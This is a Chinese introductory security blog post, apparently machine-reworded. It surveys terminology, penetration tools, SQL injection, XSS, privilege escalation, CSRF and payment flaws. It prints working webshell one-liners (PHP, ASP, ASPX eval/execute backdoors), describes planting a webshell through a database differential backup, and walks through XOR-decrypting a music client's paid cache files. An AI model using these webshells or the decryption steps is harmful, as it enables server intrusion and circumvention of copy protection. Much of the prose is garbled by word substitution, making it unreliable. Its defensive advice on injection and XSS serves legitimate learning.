首页 » SEO优化 » phpevalpostvalue技巧_一收集安然与病毒勒索

phpevalpostvalue技巧_一收集安然与病毒勒索

访客 2024-11-01 0

扫一扫用手机浏览

文章目录 [+]

1.网安术语

根本知识:

phpevalpostvalue技巧_一收集安然与病毒勒索

风险评估1)渗透测试技能:踩点扫描探测、信息网络、暴力办理、漏洞扫描、Web权限获取、Web提权、溢出攻击、植入后门、内网渗透等。
2)安全漏洞的代码审计和代码加固技能:缓冲区溢出、谢绝做事、远程命令实行、注入、跨站、Web提权。

phpevalpostvalue技巧_一收集安然与病毒勒索
(图片来自网络侵删)

安全防护

1)中间件和Web运用的安全监测与防护方法:框架漏洞、权限绕过、弱口令、注入、跨站、文件包含、文件上传、命令实行、任意文件读取和下载等。

2)主流厂商网络安全设备的调试与配置;主流数据库系统的补丁、账号管理、口令强度、有效期检讨、远程做事、存储过程、审核层次、备份过程、用户功能和权限掌握等根本技能;数据库库内库外加密、硬件加密、数据库审计技能;操作系统安全管理、客户端访问掌握、入侵检测技能、数据异地灾备等技能。

3)主机操作系统和运用软件的安全配置、主机运行的运用程序、正常运行所需端口,做事的精确配置,涉及系统安全风险测试、文件系统、关键数据、配置信息、口令用户权限等内容。

应急相应

1)应急相应干系技能:入侵取证剖析、日志审计剖析等。

2)操作系统常规安全防护技能:利用系统日志、运用程序日志等溯源共计路子,系统账号、文件系统、网络参数、做事、日志审计等项目安全监测与安全加固方法。

3)网络设备和安全设备的功能及利用方法:路由器、交流机、防火墙、入侵检测系统、谢绝做事供给系统、网页防修改系统、漏洞扫描系统等。

安全加固

1)操作系统(Windows、Linux、Unix、Mac)的常规安全防护技能:利用系统日志、运用程序日志等溯源攻击路子,统账号、文件系统、网络参数、做事、日志审计等项目安全监测与安全加固方法。

2)Webcms、中间件、数据库等常规用Web运用的加固知识,运用防火墙、IPS、IDS等安全设备进行赞助加固方法。

大数据安全1)云打算和大数据技能带来的安全问题:虚拟机安全、运用程序安全、大数据安全。
2)大数据剖析技能提升网络系统安全隐患创造和防护能力。

物联网安全1)ID/IC卡的安全漏洞检测和创造技能,智能卡常见加密算法。
2)物联网运用环境中范例安全攻击:RFID攻击等。
3)无线安全、硬件安全等知识。

其他

1)密码学观点、加密算法、加密剖析工具。

2)网络攻击事理及常见网络攻击协议,数据包剖析工具。

3)Web攻击种类及常见的Web利用办法,注入攻击类型及办法。

4)漏洞产生缘故原由、漏洞的利用与防护办法。

5)恶意代码、逆向工程、沙箱保护。

6)移动互联网恶意程序检测与处置机制,移动逆向剖析与代码审计技能、移动安全防护。

7)数据规复常用技能及工具。

8)工业掌握系统、工控漏洞及加固剖析、工控漏洞玩、工控安全仿真及蜜罐、工控系统上位机及运用安全等。

常见攻击手段:

扫描爆破溢出木马病毒Web攻击无线攻击VPN挟制Kali攻击MAC泛洪攻击时钟攻击

常见术语:

0day动态剖析、静态剖析逆向剖析PE文件注册回调HOOK技能注入技能加壳、脱壳、加花社会工程学供应链渗透SAM哈希暴力彩虹表数据取证可信打算

下面分享2019年看雪安全峰会的几张图,与君共勉。
CSDN和看雪都已经20年了,这些年见证了无数技能更新,博友不断发展。

2.常用工具

Burpsuite

Burpsuite是用于攻击web运用程序的集成平台,包含了许多工具。
Burpsuite为这些工具设计了许多接口,以加快攻击运用程序的过程。
所有工具都共享一个要求,并能处理对应的HTTP 、持久性、认证、代理、日志、警报。
常日利用Burpsuite抓包剖析,探求Web漏洞。

手机APP渗透两种思路:

(1) 电脑浏览器打开链接,burpsuite抓包,修正user-Agent的内容。
一样平常是判断user-Agent里有没有MicroMessenger(适宜没有做重定向,或者重定向不加token验证)。

(2) 做了重定向,加token验证。
手机和电脑同在一个局域网下,设置电脑为手机代理,用burpsuite抓包。
设置了电脑代理手机的情形下,电脑相称于一层网关,自然抓取的到。

+++++++++++++++++++++++++++++++++++++++++++++++++++++++

Fiddler

Fiddler是位于客户端和做事器真个HTTP代理,也是目前最常用的http抓包工具之一 。
它能够记录客户端和做事器之间的所有 HTTP要求,可以针对特定的HTTP要求,剖析要求数据、设置断点、调试web运用、修正要求的数据,乃至可以修正做事器返回的数据,功能非常强大,是web调试的利器。

Fiddler是用C#写出来的,它包含一个大略却功能强大的基于JScript .NET 事宜脚本子系统,它的灵巧性非常棒,可以支持浩瀚的http调试任务,并且能够利用.net框架措辞进行扩展。
安装前需安装microsoft .net framework可实行文件。

手机渗透:可以考试测验抓取微信浏览器中的构造头,接着通过fiddler的办法,在用第三方(360、QQ、谷歌等)打开的时候,所有数据都会经由fiddler,将该构造修正即可。

SQLMAPSQLMAP是一款非常强大的开源渗透测试工具,用于自动检测和利用SQL注入漏洞掌握数据库做事器的过程。
它配备了一个强大的检测引擎,由Python措辞开拓完成,通过外部连接访问数据库底层文件系统和操作系统,并实行命令实现渗透。

OllyDbgOLLYDBG是一个新的动态追踪工具,将IDA与SoftICE结合起来的思想,Ring 3级调试器,非常随意马虎上手,己代替SoftICE成为当今最为盛行的调试解密工具了。
同时还支持插件扩展功能,是目前最强大的调试工具。

IDA Pro

交互式反汇编器专业版(Interactive Disassembler Professional),是目前最棒的一个静态反编译软件,为浩瀚0day天下的成员和ShellCode安全剖析人士不可短缺的利器。
IDA Pro是一款交互式的,可编程的,可扩展的,多处理器的,交叉Windows或Linux WinCE MacOS平台主机来剖析程序, 被公认为最好的费钱可以买到的逆向工程利器。
IDA Pro已经成为事实上的剖析敌意代码的标准并让其自身迅速成为攻击研究领域的主要工具。
它支持数十种CPU指令集个中包括Intel x86,x64,MIPS,PowerPC,ARM,Z80,68000,c8051等等。

pangolinPangolin(中文译名为穿山甲)一款帮助渗透测试职员进行Sql注入测试的安全工具,是深圳宇造诺赛科技有限公司(Nosec)旗下的网站安全测试产品之一。

CaidaoCaidao软件听说是一个桂林退役士兵写的,真的很厉害。
它是一款Webshell管理工具,支持各种措辞,常见的包括ASP、ASPX、PHP、JSP、CFM等,后面希望自己也能深入研究攻防底层内容。
目前,Caidao已经被中国蚁剑和冰蝎Behinder取代。

中国蚁剑

中国蚁剑是一款开源的跨平台网站管理工具,它紧张面向于合法授权的渗透测试安全职员以及进行常规操作的网站管理员。
中国蚁剑采取了Electron作为外壳,ES6作为前端代码编写措辞,搭配Babel&Webpack进行组件化构建编译,外加iconv-lite编码解码模块以及superagent数据发送处理模块还有nedb数据存储模块,组成了这个年轻而又充满活力的新一代利器。

它包括的功能有端口扫描、Socks代理、反弹Shell、内网漏洞扫描、内网代理浏览器、内网漏洞溢出测试、后门扫描、密码爆破、打包下载、交互式终端、权限提升。

GitHub上蚁剑搜AntSword:https://gitee.com/mirrors/antSword

冰蝎Behinder地址:https://github.com/rebeyond/Behinder

差异备份

数据备份紧张分位完备备份、增量备份和差异备份。
个中差异备份是指备份自上一次完备备份之后有变革的数据,在差异备份过程中,只备份有标记的那些选中的文件和文件夹。
它不用除标记,即备份后不标记为已备份文件,不用除存档属性。

整体流程是先备份日志,然后插入一句话Muma;再次备份时,数据库只会备份两次间隔中的差异,使得天生出来的文件尽可能小,故称为“差异备份”。

一句话木马是:

<?php substr(md5($_REQUEST[x]),28)==acd0&&eval($_REQUEST[abc]);?>

一句话木马插入到数据库表的a字段中,实行吸收自定义Sh参数,类似于URL的Code参数,相称于是一个侧门,第二部分Caidao会利用到。

asp:    <%execute(request("value"))%>php:    <?php @eval($_POST[value]);?>aspx:    <%eval(Request.Item["value"])%>二.常见攻击

感谢汤神的分享,推举大家阅读下面两篇原文,这里紧张是学习看雪论坛分享的知识,也作为自己网络安全的入门文章,如果读者以为这部分不好或侵权,作者可以删除。

代码注入、CSRF、0元支付、短信轰炸这些都是非常常见的漏洞,这里大略阐明这些名词。

1.SQL注入

汤神从漏洞成因,攻击办法以及防御方案三个方面讲解SQL注入。
漏洞成因我们可以用这两句话,利用用户参数拼接这个SQL语句,这个参数改变了原有的SQL构造,改变了这个SQL的注入。

下图左边这是一个数据库,白色部分的字体是我们在代码中写到的SQL构造,玄色部分便是攻击者可能会传入的参数(‘1’='1’始终成)。
当我们把这个SQL构造拼接出来之后形成了一个新的构造,这个构造被实行之后把整张表所有的数据传输出来,数据库比较大的访问更多要求,全体可能就挂了,还造成一些数据泄露的情形,这些便是SQL的注入成因,参数改变了原有的SQL构造。

攻击者常日有哪几种攻击办法?汤神把它分为了三种类型:一种是回显注入,一种是报错注入,一种是盲注。

回显注入

利用注入漏洞可以改变页面返回数据,则称之为回显注入。

第一张图是传入ID是正常的正型数字,返回的结果是用户的一个信息传入ID即是1,上面URL把这个参数修正了一下,即是1,然后加了 or 1=‘1,当它拼接到之后,跟前面一样把全体表的数据传输出来,这边看到全体用户表的数据都被列举出来了。
利用漏洞可以改变这个页面的数据我们叫做回显注入,这个黑客可以直接把这个数据下载下来。

报错注入

下图非常清楚看到,URL上面这个部分是正常URL加长进击者所利用的攻击代码。
实在这上面的攻击代码也是实行不了,但放到数据库中,末了会造成数据库返回非常码,并把非常码抛出来,接着这个用户名(act_admin 10.59.107.125)就被展示出来了。
这是非常敏感的信息,我们写代码的时候须要把数据库抛出来的缺点屏蔽,不让其在前台显示出来,通过报错显示了一些敏感信息,我们称之为报错注入。

盲注

盲注和回显注入以及报错注入不一样,我们没有办法通过页面数据看到它的差异。
可以通过两种办法实现盲注——布尔盲注和韶光盲注。
下图中绿色部分是正常URL,赤色部分是布尔注入的表示式,前面加一个and截取一个字符,判断一下id的第一个字符是不是大于字母a。

如果成立则全体条件都成立,这个时候页面是有反馈数据的;如果不成立这个页面就不返回数据,这便是布尔数据。
我们可以看到有数据和没有数据的情形,当字母a不断变换的时候,也可以把这个数据库里面的数据预测出来。

韶光盲注是下面蓝色区域部分,我们知道数据库里面可以用一些IF函数,也是截取第一个字符,如果这个不成立就到五秒钟返回,通过这个页面返回的韶光可以判断这个地方是不是有注入的,也可以把这个数据都给下载下来。

刚刚说到攻击者碰到的三种攻击办法,下面看一下怎么样检测页面当中有没有注入点?我们通过SQLMAP实现,可以看到这是一个CMD窗口,上面是写到的检测表达式,Splmap.py以及须要检测的UI,须要有这个注册点它会见告你有哪些注入,比如说这个页面是在本地测试的结果,它就见告了有回显注入、缺点注入以及一些盲注。

呢么,怎么样戒备做事器的安全呢?

第一种方法是拦截带有SQL语法的参数的传入。
参数会改变SQL的构造,当我们知道这个参数是整型的时候,就把这个参数转型为整型,整型肯定不包括这个SQL构造,无法改变构造,哪就不存在SQL注入。

第二种方法是通过预编译处理拼接参数的SQL语句。
有的时候我们无法预测它传什么参数,比如我们去论坛回答一个帖子,肯定没有办法掌握,这个时候我们可以用PDO预处理,这是最常见的方法,也是一个最好的方法。
但有时我们会写一些繁芜社会语句,会用第一种方法,我们先定义好这个SQL语句构造,再把参数放进去,这个时候是无法达到变动SQL语句处理的目的。

第三个方法是定期剖析数据库实行日志,判断是否有非常SQL实行。
当业务比较大的时候,日志是非常多的,可以找一些SQL的取模软件进行取模,取模之后并不太多,如果直接看的话是海量日志,是没法看的。

2.XSS跨站

跨网站脚本(Cross-site scripting,常日简称为XSS或跨站脚本或跨站脚本攻击)是一种网站运用程序的安全漏洞攻击,是代码注入的一种。
它许可恶意用户将代码注入到网页上,其他用户在不雅观看网页时就会受到影响。
这类攻击常日包含了HTML以及用户端脚本措辞。

XSS攻击常日指的是通过利用网页开拓时留下的漏洞,通过奥妙的方法注入恶意指令代码到网页,利用户加载并实行攻击者恶意制造的网页程序。
这些恶意网页程序常日是JavaScript,但实际上也可以包括Java、VBScript、ActiveX、 Flash或者乃至是普通的HTML。
攻击成功后,攻击者可能得到更高的权限(如实行一些操作)、私密网页内容、会话和cookie等各种内容。

紧张从漏洞成因、攻击场景和防御方法三方面讲解。

如上图所示,上面有一个URL,下面是一个页面返回的HTML代码,我们可以看到白色部分HTML是我们事先定义好,玄色部分参数是用户想搜索的关键词。
当我们搜索了test+Div末了即是123,对后反馈页面一样平常搜索会见告你用户搜索了什么关键词,结果如何等等。

这个地方如果没有做好转移,可能会造成XSS跨站,我们可以看到蓝色部分是我们事先定义好的构造,被攻击者利用之后它先把这个DIV结束了,末了加上一个script标签,它也有可能不跟你谈标签,直接发送到它的做事器上。
参数未经由安全过滤,然后恶意角本被放到网页当中实行,用户浏览的时候实行了这个脚本。

漏洞缘故原由即为:

XSS分为三种类型——反射型、存储型以及DOM型。

反射型下图是专门演习一些WEB漏洞的练习页面,我们可以输入自己的名字,输入之后会把我们的名字显示出来。
例如我们输入了一个“张三”,这个时候弹出来了一个“123”,在那边显示了一个张三,但是script标签没有出来,由于这个标签被实行了。

存储型

在存储型XSS中,可以看到这个URL上面并没有代码,但是依然弹出了一个“1”。
它是创造个人资料页的时候有一个XSS漏洞,在个性署名的位置填入了一个XSS标签,弹出了一个“1”,把这个地址发给别人,别人看到这个地址并没有什么代码以为这个页面是安全的,结果一打开就插入了这个XSS代码。

存储型XSS的攻击危害比较大,由于它的页面当中是看不到这个Script的代码,别人防不胜防。
只要管理员没有创造,下一个用户或者下一个用户一贯接发它,而反射型须要用户主动点击的。

DOM型

Dom型的XSS是一些有安全意识的开拓者弄出来的。
比如说接管参数会做一些过滤,把一些字符转义一下,但是转义之后依然会存在着XSS的情形,比如说下图中,我们上面输入的可以看到这行代码规律,把这个大括号、小括号以及双页号进行转移,按理说转移之后它该当不会再作为它的标签存在,不会存在XSS的代码。

下面Script通过ID得到的这个值,复制到了这个DIV上,经由DOM操作之后,之前转义的字符就变为它的标签,以是经由DOM操作的XSS我们称之为DOMXSS。
它有可能通过URL传播,也有可能通过做事器的传播。

末了给出一些编码的戒备方法。

第一是标签黑白名单过滤。
有时根本就不须要考虑到它是不是HTML标签,我们根本用不到HTML标签。

第二是代码实体转义。
只保留笔墨部分这是一劳永逸的,有时我们还是须要展示这个标签,比如说程序论坛当中要贴一个代码,这个时候我们须要用一些转义,它会把这个大括号、小括号以及双引号做一个转义,做为一个字符,就无法实行这个标签型,后面加一个参数,但有时候单引号也会造成XSS。

第三是httponly防止cookie被盗取。
一个旗子暗记当中有那么多的地方存在着这个输入以及检测的地方,可能就有一些地方漏掉,只要有一个地方漏掉了,用户的cookie信息就被盗取了。
做事器在发送用户信息的时候,我们须要加上一个httponly,这个代码无法读取到cookie的信息,那么攻击者也是得不到这个信息的。
对付用户来说也是非常好的保护。
比如说张三在我们网站上上岸了一下用户名,李四他特意发了一个攻击要求,他拿不到这个用户ID,就伪装不了这个张三。

如果在Cookie中设置了HttpOnly属性,那么通过js脚本将无法读取到Cookie信息,这样能有效的防止XSS攻击

3.越权漏洞

我们再来看看越权漏洞,在一些系统当中如果存在着多种用户角色,每一种角色有不同的权限。
操作业务适宜如果权限不严格可能会发生越权漏洞。
越权分为垂直越权和平行越权,其产生缘故原由包括:

1)业务系统存在用户权限验证

2)对用于的权限验证不严谨

3)用户能操作不属于自己权限的操作

平行越权

在WEB系统中有商城,这个商城中必不可少的就有订单,订单肯定有一个店铺ID,我们常日把它设置为一个自增长的ID,这个ID是一个数字类型。
在URL上面如果有一个订单ID便是100,攻击者会考试测验100+1,当它ID即是101或者99的时候能否访问到。

如果能访问到并且这个订单信息不是我的,这个地方就存在着一个漏洞。
张三可以看到李四的订单信息,这个时候就存在着越权。
张三和李四是平级的用户,他们两个权限是一样,相互可以看到平台信息这叫做平行越权。

这个有什么危害呢?

比如说这个网站有漏洞,如果是竞争对手他就可以知道用户在我的平台高下过订单的行为,然后去营销。
如果把这个订单ID直接暴露出来,还有一种可能便是竞争对手会根据我们的订单IP的增长量,判断我们的增长量,就知道我们一天到底有多少订单。

平行越权防御方法:我们查询的时候必须加上当前用户的ID,便是orderID加上UID,这样不会涌现张三可以看到李四的订单了。

垂直越权接下来我们再看一下垂直越权,这是一个普通用户进入到后台管理系统中,他的权限就扩大化了。
常日这种情形下,后台汇合成到更多的掌握器来统一管理,但依然有一些邮件会漏掉并没有集成到,就会发生这种情形。

黑客不会一个一个找,会通过一些扫描器创造漏洞进去。
建议不要把自增长ID暴露出来,可以做对称加密或者非对称加密,先转换为一个字母类型,让别人看不到你的数字型的ID是多少。
别人就没有办法通过这个加一减一的办法越权,也看不到你的一天业务增长量。

汤神建议只管即便把前台的方法和后台的方法区分开来。
越权,实在不仅仅限于展示,我们刚刚看到了这个订单,张三可以看到李四的订单信息是查看,但是有的时候我们修正订单的时候也会涌现这个问题,以是在读写的时候都须要把稳一下这个越权的问题。

4.CSRF跨站要求假造

CSRF常日汇合营XSS利用。
做事端错把浏览器发起的要求当成用户发起的要求,会造成XSS问题。
比如说我打开了张三的网站,上岸了一个用户信息,李四网站上有一个攻击代码,向张三这个网站发起要求,张三的网站会以为你本人发起的要求,实际上是浏览器发出的要求。

产生缘故原由为:

1)做事端错把“浏览器发起的要求”当成“用户发起的要求”

2)已登录的浏览器,打开恶意网址后,被实行了相应操作

下图中有一个表单,左边是它的源码,我们可以看到表单每一项都在,但是从安全的角度上考虑它是少了一样东西,没有一些验证码或者TOKEN等等干系信息。
做事端如果没有验证这个问题,就会造成这个CSRF的攻击。

如何检测我们的系统当中是否存在这个CSRF?1)去掉token参数考试测验能够正常要求2)去掉referer是否可以提交成功3)是否能用GET提交替代POST提交

如果以上都存在,那么它就存在CSRF。
建议一定要验证Reeferer信息、Token验证、图片验证码等。
根据业务安全等级越高,最根本的可以用这个refefe验证,再高一级便是token,再高一级便是图片验证。

5.支付漏洞

末了看看支付漏洞。
汤神之前看到一个新闻,有一个浙江老板,他想做线上找人做了一个网站,这个网站存在着一些支付漏洞,一周之后他创造这个订单量极速上升,卖了70多万,结果看了一下帐户余额只有几千块钱,报警之后才查到缘故原由,但是货色已经发出去了。

支付漏洞紧张产生的缘故原由包括:

1)开拓者在数据包中通报支付的金额

2)后端没有对金额做校验或者署名

3)导致攻击者可以随意修改金额提交

造成这些漏洞缘故原由有很多,比如说支付金额是由前端提交的数据,不是后端打算的,而且没有对这个金额做校验,直接信赖前端提交的金额,导致这个攻击者可以随即修正这个金额,比如修正为一分钱,这是非常范例的可以随意变动这个金额。

上面的金额是94元,这个表单里面改为一分钱,末了提交的时候是一分钱,这是非常好的漏洞,也是非常范例的。

修正数量:

还有一个问题是数量的限定,一个价格是26元,一个是27元,把这个数量变为负一之后,一提交变为一块钱了。
这是之前数据包的漏洞,他充值了一块钱,他创造有一个数据包向网站发送,他就把这个数据包反复重放,就加了好几次,实际上只充值了一块钱。

末了给出了汤神这次分享的思维导图。

PS:至心感激自己要学习的知识好多,也有好多大神卧虎藏龙,低调加油,一起进步~

三.音乐异或解密示例

接下来复现CSDN“鬼手56”大神的文章,他的网络安全、Crackme、病毒剖析、软件逆向等系列文章至心推举大家学习,包括他开源的项目,他的文章我都准备all in。

顺便补充我俩的对话,一句“本日最愉快的是便是看到你的这条评论”道出了多少程序员的纯洁和可爱,分享知识和开源代码的路上,真须要你我的点赞。
电脑前的你我,一起同行。

我们打开PC端某音乐客户端,比如想下载周杰伦的“骑士精神”,常日须要提示付费。

此时点开设置,选中“下载设置”,找到缓存文件目录。
C:\Users\yxz\AppData\Local\Netease\CloudMusic\Cache\Cache

双击播放该歌曲,然后按照探求最新的文件或只保留一首歌,个中后缀名为“.uc”的最大文件便是加密过后的文件。

接在将文件拖动到010 Editor软件,如下图所示:它是一个加密文件,最多的数据是A3,鬼手大神成果的预测其是加密后的无意义0,常日音频的加密办法不会太繁芜,而最大略的异或加密(可逆)。

接着点开菜单,Tools(工具),将其转换为“十六进制”,进行“二进制异或”操作,修正数据为无符号十六进制,并对A3进行异或即可。

把稳选择无符号(Unsigned Byte)和异或A3

异或加密解密

A3 ⊕ A3 = 00

A 01100001 3 00000011A 01100001 3 00000011 0 00000000 0 00000000

文件解密如下所示,个中A3变换为00,解密完之后的字符变得故意义。
前三个字节是ID3,这个是MP3文件格式的头部。

末了将文件重命名为“.mp3”,此时可以听歌了,“骑士精神”走起。

PS:这是一个大略的加密过程,推举读者们下载正版歌曲,共同掩护版权和绿色网络环境。
同时,异或加密音乐已经很多年了,希望这些开拓公司优化下加密算法,办理这个漏洞。
这篇文章更希望分享加密的过程给读者。

四.总结

希望这篇根本性文章对你有所帮助,如果有缺点或不敷之处,还请海涵。
后续将分享更多网络安全方面的文章了,从零开始很难,但秀璋会一起走下去的,加油。

故人应在千里外,

不寄梅花远信来。

武汉第一周学习结束,寄了第一封家书给女神,接下来这几年,该当会写上200来封吧,很期待,也很漫长,但我俩的故事将连续书写。

未来的路还很长,精良的人真的太多,我们只有做好自己,不忘初心,享受生活,雕琢前行。
来日诰日周末连续奋斗,晚安娜,记得收信。

标签:

相关文章

QQ聊天恶搞代码技术背后的趣味与风险

人们的生活越来越离不开社交软件。在我国,QQ作为一款历史悠久、用户众多的社交平台,深受广大网民喜爱。在QQ聊天的过程中,恶搞代码的...

SEO优化 2025-03-02 阅读1 评论0

Python代码截屏技术与应用的完美融合

计算机屏幕截图已经成为人们日常生活中不可或缺的一部分。无论是分享工作成果、记录游戏瞬间,还是保存网页信息,屏幕截图都发挥着重要作用...

SEO优化 2025-03-02 阅读1 评论0

QQ无限刷礼物代码技术突破还是道德沦丧

社交平台逐渐成为人们生活中不可或缺的一部分。QQ作为我国最具影响力的社交软件之一,其丰富的功能吸引了大量用户。近期有关QQ无限刷礼...

SEO优化 2025-03-02 阅读1 评论0